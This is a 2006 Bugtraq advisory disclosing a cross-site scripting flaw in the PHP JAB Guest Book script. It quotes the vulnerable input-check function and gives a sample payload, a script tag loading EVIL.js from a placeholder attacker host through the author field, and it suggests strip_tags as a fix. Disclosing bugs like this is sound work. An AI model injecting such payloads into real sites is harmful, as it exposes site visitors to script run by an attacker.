XSS in JAB Guest Book

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XSS in JAB Guest Book
From: nj@xxxxxxxxxx
Date: 4 Dec 2006 16:20:37 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Script Name: JAB Guest Book
Authors: Barnz@xxxxxxxxxxxxx
Website: James Barnsley
Bug Report: NetJackal (nj[AT]hackerz[DOT]ir & nima_501[AT]yahoo[DOT]com)
Status: Patch not released
First i should apologize for my bad english.
Intro:
        JAB Guest Book is a free guest book written in PHP, it works using flat 
files 
to store data which means no database is needed. Features include easy 
installation
and customisation into your existing website. An administration panel which 
allows 
you to delete posts and ban users, additional administration configuration to 
un-ban
users and to use the bad word filter. Ability for users to post messages with 
topic,
email and comments including emotions (smilies). The main guest book works 
completely
using only one file.
Bugs Description:
        look at pbguestbook.php at line 425:
        
         
        function invalideregtest($input)
                {
                $checkcount = 0;
                
                //$exinput = str_split($input);
                
                $countname = count($exinput);
        
                for($i=0; $i<$countname; $i++)
                        {
                        if(!ereg("[A-Za-z0-9]", $input[$i]) == 1)
                                {
                                $checkcount++;
                                }
                        }
        
                if($checkcount != 0)
                        {
                        $input = "no";
                        }
                else
                        {
                        $input = "yes";
                        }
        
                return($input);
                }
        $check1 = invalideregtest($topic);
        
        script just check $topic by invalideregtest function. so what's happen 
if we put some thing lile
<SCRIPT SRC=http://Hacler/EVIL.js></script> in $author? yes true answer xss 
happens

Solution:
        Edit the code and check other inputs by invalideregtest function or 
simply remove html tags by
strip_tags function (PHP built-in function)

Prev by Date: [USN-392-1] xine-lib vulnerability
Next by Date: rPSA-2006-0211-2 doxygen libpng
Previous by thread: [USN-392-1] xine-lib vulnerability
Next by thread: Re: XSS in JAB Guest Book
Index(es):
- Date
- Thread